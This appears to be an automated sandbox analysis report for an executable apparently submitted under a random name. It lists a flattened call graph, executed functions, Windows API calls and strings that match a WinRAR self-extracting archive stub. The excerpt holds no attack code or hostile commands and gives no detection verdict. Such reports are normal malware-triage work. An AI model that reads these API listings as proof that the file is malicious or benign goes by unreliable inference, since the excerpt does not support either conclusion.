_free 20 API calls 30183->30184 30202 e8fc3e 38 API calls _abort 30183->30202 30203 e918e1 EnterCriticalSection 30183->30203 30204 e9288f LeaveCriticalSection _abort 30183->30204 30184->30183 30186 e8b543 __cftof 38 API calls 30185->30186 30187 e9247d 30186->30187 30188 e9248c GetOEMCP 30187->30188 30189 e9249e 30187->30189 30190 e924b5 30188->30190 30189->30190 30191 e924a3 GetACP 30189->30191 30190->30163 30192 e9040e 30190->30192 30191->30190 30193 e9044c 30192->30193 30198 e9041c __dosmaperr 30192->30198 30206 e901d3 20 API calls __dosmaperr 30193->30206 30194 e90437 RtlAllocateHeap 30196 e9044a 30194->30196 30194->30198 30196->30166 30199 e928a0 51 API calls 2 library calls 30196->30199 30198->30193 30198->30194 30205 e8e91a 7 API calls 2 library calls 30198->30205 30199->30168 30200->30166 30201->30166 30203->30183 30204->30183 30205->30198 30206->30196 30207 e84d22 30208 e84ce9 30207->30208 30208->30207 30209 e84fce ___delayLoadHelper2@8 17 API calls 30208->30209 30209->30208 30210 e84a07 30211 e84910 30210->30211 30212 e84fce ___delayLoadHelper2@8 17 API calls 30211->30212 30212->30211 30216 e6e3d5 30217 e6e3df 30216->30217 30220 e6e551 SetFilePointer 30217->30220 30222 e6e403 30217->30222 30218 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30219 e6e481 30218->30219 30221 e6e56e GetLastError 30220->30221 30220->30222 30221->30222 30222->30218 30223 e8437d 30224 e84389 __EH_prolog3_GS 30223->30224 30225 e74318 53 API calls 30224->30225 30226 e843c6 30225->30226 30227 e76a25 53 API calls 30226->30227 30228 e843d0 30227->30228 30229 e625a4 26 API calls 30228->30229 30230 e843dc 30229->30230 30231 e61a66 26 API calls 30230->30231 30232 e843e4 30231->30232 30233 e61de7 SetDlgItemTextW 30232->30233 30234 e843f5 30233->30234 30235 e80678 5 API calls 30234->30235 30236 e843fa 30235->30236 30240 e84430 30236->30240 30241 e619a9 26 API calls 30236->30241 30237 e85787 5 API calls 30239 e84446 30237->30239 30240->30237 30241->30240 30242 e6e0b0 30243 e6e0c9 30242->30243 30247 e6e850 111 API calls 30243->30247 30244 e6e0cd 30246 e6e850 111 API calls 30244->30246 30245 e6e0fb 30246->30245 30247->30244 30248 e86452 30249 e8645e __FrameHandler3::FrameUnwindToState 30248->30249 30280 e85e63 30249->30280 30251 e86465 30252 e865b8 30251->30252 30255 e8648f 30251->30255 30383 e86878 4 API calls 2 library calls 30252->30383 30254 e865bf 30376 e8ee14 30254->30376 30267 e864ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 30255->30267 30291 e8f9ad 30255->30291 30262 e864ae 30264 e8652f 30299 e86993 GetStartupInfoW __cftof 30264->30299 30266 e86535 30300 e8f8fe 51 API calls 30266->30300 30267->30264 30379 e8e9b0 38 API calls 3 library calls 30267->30379 30270 e8653d 30301 e8454a 30270->30301 30274 e86551 30274->30254 30275 e86555 30274->30275 30276 e8655e 30275->30276 30381 e8edb7 28 API calls _abort 30275->30381 30382 e85fd4 12 API calls ___scrt_uninitialize_crt 30276->30382 30279 e86566 30279->30262 30281 e85e6c 30280->30281 30385 e86694 IsProcessorFeaturePresent 30281->30385 30283 e85e78 30386 e896d9 10 API calls 2 library calls 30283->30386 30285 e85e7d 30290 e85e81 30285->30290 30387 e8f837 30285->30387 30288 e85e98 30288->30251 30290->30251 30293 e8f9c4 30291->30293 30292 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30294 e864a8 30292->30294 30293->30292 30294->30262 30295 e8f951 30294->30295 30297 e8f980 30295->30297 30296 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30298 e8f9a9 30296->30298 30297->30296 30298->30267 30299->30266 30300->30270 30395 e76d7b 30301->30395 30304 e71309 30 API calls 30305 e84572 30304->30305 30477 e7f4d4 30305->30477 30307 e8457b __cftof 30481 e7f89a 30307->30481 30311 e84608 GetCommandLineW 30312 e84618 30311->30312 30313 e846f9 30311->30313 30315 e614a7 28 API calls 30312->30315 30314 e713f9 29 API calls 30313->30314 30316 e84703 30314->30316 30317 e84622 30315->30317 30318 e625a4 26 API calls 30316->30318 30319 e819ee 115 API calls 30317->30319 30320 e84710 30318->30320 30321 e8462c 30319->30321 30322 e61a66 26 API calls 30320->30322 30323 e61a66 26 API calls 30321->30323 30324 e84719 SetEnvironmentVariableW GetLocalTime 30322->30324 30325 e84635 30323->30325 30332 e6f6ba _swprintf 51 API calls 30324->30332 30326 e846dc 30325->30326 30327 e84642 OpenFileMappingW 30325->30327 30329 e614a7 28 API calls 30326->30329 30330 e8465b MapViewOfFile 30327->30330 30331 e846d2 CloseHandle 30327->30331 30333 e846e6 30329->30333 30330->30331 30334 e8466b UnmapViewOfFile MapViewOfFile 30330->30334 30331->30313 30335 e8477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 30332->30335 30337 e83efc 30 API calls 30333->30337 30334->30331 30338 e84689 30334->30338 30336 e807e5 34 API calls 30335->30336 30339 e847bc 30336->30339 30340 e846f0 30337->30340 30341 e7fc38 28 API calls 30338->30341 30342 e73538 133 API calls 30339->30342 30343 e61a66 26 API calls 30340->30343 30344 e84699 30341->30344 30345 e847cc 30342->30345 30343->30313 30346 e83efc 30 API calls 30344->30346 30347 e7d255 28 API calls 30345->30347 30348 e846a2 30346->30348 30349 e847d8 30347->30349 30350 e75109 114 API calls 30348->30350 30351 e7d255 28 API calls 30349->30351 30352 e846b5 30350->30352 30353 e847e1 DialogBoxParamW 30351->30353 30354 e751bf 114 API calls 30352->30354 30355 e7d347 26 API calls 30353->30355 30356 e846c0 30354->30356 30357 e8481e 30355->30357 30359 e846cb UnmapViewOfFile 30356->30359 30358 e7d347 26 API calls 30357->30358 30360 e8482a 30358->30360 30359->30331 30361 e8483a 30360->30361 30362 e84833 Sleep 30360->30362 30363 e84848 30361->30363 30364 e7fb4b 48 API calls 30361->30364 30362->30361 30365 e84852 DeleteObject 30363->30365 30364->30363 30366 e8486e 30365->30366 30367 e84867 DeleteObject 30365->30367 30368 e8489e 30366->30368 30369 e848b0 30366->30369 30367->30366 30370 e83fcf 6 API calls 30368->30370 30371 e7f53a GdiplusShutdown CoUninitialize 30369->30371 30372 e848a4 CloseHandle 30370->30372 30373 e848ea 30371->30373 30372->30369 30374 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30373->30374 30375 e848fd 30374->30375 30380 e869c9 GetModuleHandleW 30375->30380 30547 e8eb91 30376->30547 30379->30264 30380->30274 30381->30276 30382->30279 30383->30254 30385->30283 30386->30285 30391 e92d0a 30387->30391 30390 e896f8 7 API calls 2 library calls 30390->30290 30394 e92d23 30391->30394 30392 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30393 e85e8a 30392->30393 30393->30288 30393->30390 30394->30392 30497 e85b20 30395->30497 30398 e76dd3 GetProcAddress 30401 e76dfd GetProcAddress 30398->30401 30405 e76de5 30398->30405 30399 e76e28 30400 e7719b 30399->30400 30528 e8e50e 42 API calls 2 library calls 30399->30528 30403 e713f9 29 API calls 30400->30403 30401->30399 30406 e76e0f 30401->30406 30407 e771a6 30403->30407 30404 e77098 30404->30400 30409 e713f9 29 API calls 30404->30409 30405->30401 30406->30399 30408 e72117 45 API calls 30407->30408 30431 e771ba 30408->30431 30410 e770ac 30409->30410 30411 e770bd CreateFileW 30410->30411 30412 e770ba 30410->30412 30414 e77186 CloseHandle 30411->30414 30415 e770db SetFilePointer 30411->30415 30412->30411 30417 e61a66 26 API calls 30414->30417 30415->30414 30416 e770ed ReadFile 30415->30416 30416->30414 30418 e77109 30416->30418 30419 e77199 30417->30419 30422 e773f2 30418->30422 30423 e7711a 30418->30423 30419->30400 30421 e614a7 28 API calls 30421->30431 30534 e85ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 30422->30534 30424 e614a7 28 API calls 30423->30424 30432 e77133 30424->30432 30426 e7229d 45 API calls 30426->30431 30427 e773f7 30428 e771de CompareStringW 30428->30431 30429 e61a66 26 API calls 30429->30431 30431->30421 30431->30426 30431->30428 30431->30429 30433 e6ed1f 49 API calls 30431->30433 30452 e77248 30431->30452 30499 e7067e 30431->30499 30504 e76c5e 30431->30504 30434 e77176 30432->30434 30439 e76c5e 30 API calls 30432->30439 30529 e76366 30432->30529 30433->30431 30438 e61a66 26 API calls 30434->30438 30435 e77292 30436 e7729e 30435->30436 30437 e773bd 30435->30437 30533 e72187 45 API calls 30436->30533 30441 e61a66 26 API calls 30437->30441 30442 e7717e 30438->30442 30439->30432 30445 e773c5 30441->30445 30446 e61a66 26 API calls 30442->30446 30443 e614a7 28 API calls 30443->30452 30444 e772a7 30447 e7067e 6 API calls 30444->30447 30448 e61a66 26 API calls 30445->30448 30446->30414 30450 e772ac 30447->30450 30451 e773cd 30448->30451 30449 e7229d 45 API calls 30449->30452 30454 e772b3 30450->30454 30455 e77332 30450->30455 30456 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30451->30456 30452->30435 30452->30443 30452->30449 30453 e61a66 26 API calls 30452->30453 30461 e6ed1f 49 API calls 30452->30461 30453->30452 30458 e76c5e 30 API calls 30454->30458 30459 e76a25 53 API calls 30455->30459 30457 e773e8 30456->30457 30457->30304 30462 e772bd 30458->30462 30460 e7735b AllocConsole 30459->30460 30464 e77368 GetCurrentProcessId AttachConsole 30460->30464 30476 e77310 30460->30476 30461->30452 30463 e76c5e 30 API calls 30462->30463 30465 e772c7 30463->30465 30466 e77383 30464->30466 30467 e74318 53 API calls 30465->30467 30471 e7738c GetStdHandle WriteConsoleW Sleep FreeConsole 30466->30471 30468 e772ec 30467->30468 30470 e76a25 53 API calls 30468->30470 30469 e773b5 ExitProcess 30472 e772f6 30470->30472 30471->30476 30473 e74318 53 API calls 30472->30473 30474 e77307 30473->30474 30475 e614a7 28 API calls 30474->30475 30475->30476 30476->30469 30478 e76c5e 30 API calls 30477->30478 30479 e7f4e8 OleInitialize 30478->30479 30480 e7f50b GdiplusStartup SHGetMalloc 30479->30480 30480->30307 30482 e625a4 26 API calls 30481->30482 30483 e7f8a8 30482->30483 30484 e625a4 26 API calls 30483->30484 30485 e7f8b4 30484->30485 30486 e625a4 26 API calls 30485->30486 30487 e7f8c0 30486->30487 30488 e625a4 26 API calls 30487->30488 30489 e7f8cc 30488->30489 30490 e7f84c 30489->30490 30491 e61a66 26 API calls 30490->30491 30492 e7f857 30491->30492 30493 e61a66 26 API calls 30492->30493 30494 e7f85f 30493->30494 30495 e61a66 26 API calls 30494->30495 30496 e7f867 30495->30496 30498 e76d8d GetModuleHandleW 30497->30498 30498->30398 30498->30399 30500 e706a4 GetVersionExW 30499->30500 30501 e706d1 30499->30501 30500->30501 30502 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30501->30502 30503 e706fa 30502->30503 30503->30431 30505 e76c6a __EH_prolog3_GS 30504->30505 30506 e856f6 28 API calls 30505->30506 30507 e76c77 30506->30507 30508 e76c8d GetSystemDirectoryW 30507->30508 30509 e76cab 30508->30509 30526 e76ca4 30508->30526 30510 e614a7 28 API calls 30509->30510 30511 e76ccd 30510->30511 30513 e614a7 28 API calls 30511->30513 30512 e76d71 30515 e85787 5 API calls 30512->30515 30516 e76cda 30513->30516 30514 e612a7 26 API calls 30514->30512 30517 e76d78 30515->30517 30535 e71ad1 30516->30535 30517->30431 30520 e61a66 26 API calls 30521 e76cf7 30520->30521 30522 e61a66 26 API calls 30521->30522 30523 e76cff LoadLibraryW 30522->30523 30525 e76d1c 30523->30525 30523->30526 30525->30526 30545 e619a9 26 API calls 30525->30545 30526->30512 30526->30514 30528->30404 30531 e76380 30529->30531 30530 e763b7 30530->30432 30531->30530 30532 e61b63 28 API calls 30531->30532 30532->30531 30533->30444 30534->30427 30536 e71add __EH_prolog3_GS 30535->30536 30537 e67673 28 API calls 30536->30537 30538 e71aef 30537->30538 30540 e71b0c 30538->30540 30546 e70ddb 28 API calls 30538->30546 30541 e61a66 26 API calls 30540->30541 30542 e71b35 30541->30542 30543 e85787 5 API calls 30542->30543 30544 e71b3a 30543->30544 30544->30520 30545->30526 30546->30540 30548 e8eb9d _unexpected 30547->30548 30549 e8eba4 30548->30549 30550 e8ebb6 30548->30550 30583 e8eceb GetModuleHandleW 30549->30583 30571 e918e1 EnterCriticalSection 30550->30571 30553 e8eba9 30553->30550 30584 e8ed2f GetModuleHandleExW 30553->30584 30554 e8ec5b 30572 e8ec9b 30554->30572 30557 e8ebbd 30557->30554 30559 e8ec32 30557->30559 30592 e8f6a0 20 API calls _abort 30557->30592 30563 e8ec4a 30559->30563 30568 e8f951 _abort 5 API calls 30559->30568 30561 e8ec78 30575 e8ecaa 30561->30575 30562 e8eca4 30593 e98fc0 5 API calls __ehhandler$___std_fs_change_permissions@12 30562->30593 30564 e8f951 _abort 5 API calls 30563->30564 30564->30554 30568->30563 30571->30557 30594 e91931 LeaveCriticalSection 30572->30594 30574 e8ec74 30574->30561 30574->30562 30595 e91d26 30575->30595 30578 e8ecd8 30581 e8ed2f _abort 8 API calls 30578->30581 30579 e8ecb8 GetPEB 30579->30578 30580 e8ecc8 GetCurrentProcess TerminateProcess 30579->30580 30580->30578 30582 e8ece0 ExitProcess 30581->30582 30583->30553 30585 e8ed59 GetProcAddress 30584->30585 30586 e8ed7c 30584->30586 30587 e8ed6e 30585->30587 30588 e8ed8b 30586->30588 30589 e8ed82 FreeLibrary 30586->30589 30587->30586 30590 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30588->30590 30589->30588 30591 e8ebb5 30590->30591 30591->30550 30592->30559 30594->30574 30596 e91d4b 30595->30596 30597 e91d41 30595->30597 30602 e91948 5 API calls __dosmaperr 30596->30602 30599 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 30597->30599 30600 e8ecb4 30599->30600 30600->30578 30600->30579 30601 e91d62 30601->30597 30602->30601 30603 e82813 30604 e67673 28 API calls 30603->30604 30607 e82832 _wcslen 30604->30607 30605 e82af7 30677 e658cb 45 API calls 30605->30677 30606 e82a9a 30606->30605 30608 e67673 28 API calls 30606->30608 30607->30605 30607->30606 30612 e6120c 28 API calls 30607->30612 30609 e82aec 30608->30609 30635 e838a0 30609->30635 30613 e828fe 30612->30613 30673 e7645a 28 API calls 30613->30673 30615 e82a01 30625 e82a39 30615->30625 30675 e619a9 26 API calls 30615->30675 30620 e6adaa CompareStringW 30633 e8292f 30620->30633 30625->30606 30676 e619a9 26 API calls 30625->30676 30630 e61a66 26 API calls 30630->30633 30632 e614a7 28 API calls 30632->30633 30633->30615 30633->30620 30633->30630 30633->30632 30674 e7645a 28 API calls 30633->30674 30640 e838ac __cftof __EH_prolog3_GS 30635->30640 30636 e61a66 26 API calls 30637 e83bcf 30636->30637 30638 e85787 5 API calls 30637->30638 30639 e83bd4 30638->30639 30639->30605 30641 e83a1e 30640->30641 30655 e83ba8 30640->30655 30684 e78da4 CompareStringW 30640->30684 30643 e614a7 28 API calls 30641->30643 30644 e83a34 30643->30644 30645 e6ed0d 49 API calls 30644->30645 30646 e83a41 30645->30646 30647 e61a66 26 API calls 30646->30647 30648 e83a4b 30647->30648 30649 e83a9d ShellExecuteExW 30648->30649 30650 e614a7 28 API calls 30648->30650 30651 e83b7c 30649->30651 30652 e83ab2 30649->30652 30653 e83a71 30650->30653 30651->30655 30687 e619a9 26 API calls 30651->30687 30656 e83ace IsWindowVisible 30652->30656 30657 e83ae5 WaitForInputIdle 30652->30657 30661 e83b30 CloseHandle 30652->30661 30685 e70e49 51 API calls 2 library calls 30653->30685 30655->30636 30656->30657 30662 e83ad9 ShowWindow 30656->30662 30678 e83fcf WaitForSingleObject 30657->30678 30659 e83a82 30664 e61a66 26 API calls 30659->30664 30665 e83b48 30661->30665 30666 e83b3d 30661->30666 30662->30657 30663 e83afb 30663->30661 30669 e83b08 GetExitCodeProcess 30663->30669 30667 e83a8e 30664->30667 30665->30651 30670 e83b73 ShowWindow 30665->30670 30686 e78da4 CompareStringW 30666->30686 30667->30649 30669->30661 30671 e83b19 30669->30671 30670->30651 30671->30661 30673->30633 30674->30633 30675->30625 30676->30606 30679 e83fea 30678->30679 30683 e8402f 30678->30683 30680 e83fed PeekMessageW 30679->30680 30681 e83fff GetMessageW TranslateMessage DispatchMessageW 30680->30681 30682 e84020 WaitForSingleObject 30680->30682 30681->30682 30682->30680 30682->30683 30683->30663 30684->30641 30685->30659 30686->30665 30687->30655

                                                                                              Executed Functions

                                                                                              Function 00E8454A Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 252filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 379 e8454a-e84612 call e76d7b call e71309 call e7f4d4 call e871f0 call e7f89a call e7f84c GetCommandLineW 392 e84618-e8463c call e614a7 call e819ee call e61a66 379->392 393 e846f9-e84722 call e713f9 call e625a4 call e61a66 379->393 406 e846dc-e846eb call e614a7 call e83efc 392->406 407 e84642-e84659 OpenFileMappingW 392->407 408 e84729-e84831 SetEnvironmentVariableW GetLocalTime call e6f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call e807e5 call e73538 call e7d255 * 2 DialogBoxParamW call e7d347 * 2 393->408 409 e84724 393->409 421 e846f0-e846f4 call e61a66 406->421 411 e8465b-e84669 MapViewOfFile 407->411 412 e846d2-e846da CloseHandle 407->412 443 e8483a-e84841 408->443 444 e84833-e84834 Sleep 408->444 409->408 411->412 415 e8466b-e84687 UnmapViewOfFile MapViewOfFile 411->415 412->393 415->412 419 e84689-e846cc call e7fc38 call e83efc call e75109 call e751bf call e751f8 UnmapViewOfFile 415->419 419->412 421->393 445 e84848-e84865 call e75041 DeleteObject 443->445 446 e84843 call e7fb4b 443->446 444->443 450 e8486e-e84874 445->450 451 e84867-e84868 DeleteObject 445->451 446->445 452 e8488e-e8489c 450->452 453 e84876-e8487d 450->453 451->450 455 e8489e-e848aa call e83fcf CloseHandle 452->455 456 e848b0-e848bd 452->456 453->452 454 e8487f-e84889 call e694b8 453->454 454->452 455->456 459 e848bf-e848cb 456->459 460 e848e1-e848e5 call e7f53a 456->460 463 e848db-e848dd 459->463 464 e848cd-e848d5 459->464 466 e848ea-e84903 call e85734 460->466 463->460 465 e848df 463->465 464->460 467 e848d7-e848d9 464->467 465->460 467->460
                                                                                              APIs
                                                                                                • Part of subcall function 00E76D7B: GetModuleHandleW.KERNEL32(kernel32,522FB702), ref: 00E76DC7
                                                                                                • Part of subcall function 00E76D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E76DD9
                                                                                                • Part of subcall function 00E76D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E76E03
                                                                                                • Part of subcall function 00E71309: __EH_prolog3.LIBCMT ref: 00E71310
                                                                                                • Part of subcall function 00E71309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00E717FB,?,?,\\?\,522FB702,?,?,?,00000000,00E9A279,000000FF), ref: 00E71319
                                                                                                • Part of subcall function 00E7F4D4: OleInitialize.OLE32(00000000), ref: 00E7F4ED
                                                                                                • Part of subcall function 00E7F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E7F524
                                                                                                • Part of subcall function 00E7F4D4: SHGetMalloc.SHELL32(00EB532C), ref: 00E7F52E
                                                                                              • GetCommandLineW.KERNEL32 ref: 00E84608
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00E8464F
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00E84661
                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00E8466F
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00E8467D
                                                                                                • Part of subcall function 00E7FC38: __EH_prolog3.LIBCMT ref: 00E7FC3F
                                                                                                • Part of subcall function 00E83EFC: __EH_prolog3_GS.LIBCMT ref: 00E83F03
                                                                                                • Part of subcall function 00E83EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00E83F1B
                                                                                                • Part of subcall function 00E83EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00E83F86
                                                                                                • Part of subcall function 00E751BF: _wcslen.LIBCMT ref: 00E751E3
                                                                                              • UnmapViewOfFile.KERNEL32(00000000,00EB5430,00000400,00EB5430,00EB5430,00000400,00000000,00000001,?,00000000), ref: 00E846CC
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E846D3
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00EA9698,00000000), ref: 00E8472F
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00E8473A
                                                                                              • _swprintf.LIBCMT ref: 00E84779
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E8478E
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00E84795
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00E847AC
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00E84803
                                                                                              • Sleep.KERNELBASE(00001B58), ref: 00E84834
                                                                                              • DeleteObject.GDI32 ref: 00E84858
                                                                                              • DeleteObject.GDI32(0F050EA2), ref: 00E84868
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                                • Part of subcall function 00E819EE: __EH_prolog3_GS.LIBCMT ref: 00E819F5
                                                                                              • CloseHandle.KERNEL32 ref: 00E848AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0T$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3142445277-4202243839
                                                                                              • Opcode ID: 6a67f898772a1918b5cab4ee8b0487c593ec383cdcc7826e1e4c9c5451f60da9
                                                                                              • Instruction ID: 2c36dc3c57a0cb382cfcdb409373cccb0b73378cb8f071bc252e3e635892120e
                                                                                              • Opcode Fuzzy Hash: 6a67f898772a1918b5cab4ee8b0487c593ec383cdcc7826e1e4c9c5451f60da9
                                                                                              • Instruction Fuzzy Hash: 4C91F3B2504740AFC325FF62EC45BAB77E8EB89704F40552EF54DB2292EB749808CB61
                                                                                              Function 00E7EBD3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 725 e7ebd3-e7ebf0 FindResourceW 726 e7ebf6-e7ec07 SizeofResource 725->726 727 e7ecec 725->727 726->727 729 e7ec0d-e7ec1c LoadResource 726->729 728 e7ecee-e7ecf2 727->728 729->727 730 e7ec22-e7ec2d LockResource 729->730 730->727 731 e7ec33-e7ec48 GlobalAlloc 730->731 732 e7ece4-e7ecea 731->732 733 e7ec4e-e7ec57 GlobalLock 731->733 732->728 734 e7ecdd-e7ecde GlobalFree 733->734 735 e7ec5d-e7ec7b call e86c70 CreateStreamOnHGlobal 733->735 734->732 738 e7ecd6-e7ecd7 GlobalUnlock 735->738 739 e7ec7d-e7ec9f call e7eb06 735->739 738->734 739->738 744 e7eca1-e7eca9 739->744 745 e7ecc4-e7ecd2 744->745 746 e7ecab-e7ecbf GdipCreateHBITMAPFromBitmap 744->746 745->738 746->745 747 e7ecc1 746->747 747->745
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E80845,00000066), ref: 00E7EBE6
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EBFD
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC14
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC23
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E80845,00000066), ref: 00E7EC3E
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E7EC4F
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E7EC73
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E7ECD7
                                                                                                • Part of subcall function 00E7EB06: GdipAlloc.GDIPLUS(00000010), ref: 00E7EB0C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E7ECB8
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00E7ECDE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 211097158-364855578
                                                                                              • Opcode ID: a15016e0dae747742181ecd4bbf7b363d3a0f94c74a96856fc1872dad51620fc
                                                                                              • Instruction ID: 3864dacb9bb98bc4ede8ffe09cd040efb4104990cf88d2f933dc80298f3f883c
                                                                                              • Opcode Fuzzy Hash: a15016e0dae747742181ecd4bbf7b363d3a0f94c74a96856fc1872dad51620fc
                                                                                              • Instruction Fuzzy Hash: 24319C75601642AFD721AF62DC48D2BBFACFF89754B14452AF809F2361EB31D805CBA0
                                                                                              Function 00E7355D Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E78781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,522FB702,00000007,?,?,?,00E78751,?,?,?,?,0000000C,00E64426), ref: 00E7879D
                                                                                              • _wcslen.LIBCMT ref: 00E7395A
                                                                                              • __fprintf_l.LIBCMT ref: 00E73AA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                              • API String ID: 1796436225-285229759
                                                                                              • Opcode ID: 7a594adc03c6931e61adbdf60e69ea7905b20c6f6b3e31cee16a8741dc046dff
                                                                                              • Instruction ID: e3004c5740bd1b2d6dc10fa1d10e6429364e13c3b23adc0645b1a500d50436ca
                                                                                              • Opcode Fuzzy Hash: 7a594adc03c6931e61adbdf60e69ea7905b20c6f6b3e31cee16a8741dc046dff
                                                                                              • Instruction Fuzzy Hash: 8352D571900249ABDF64EFB4CC45AEEB7B5FF44304F10952AE50DBB281EB719A44DB60
                                                                                              Function 00E6F826 Relevance: 9.1, APIs: 6, Instructions: 139fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
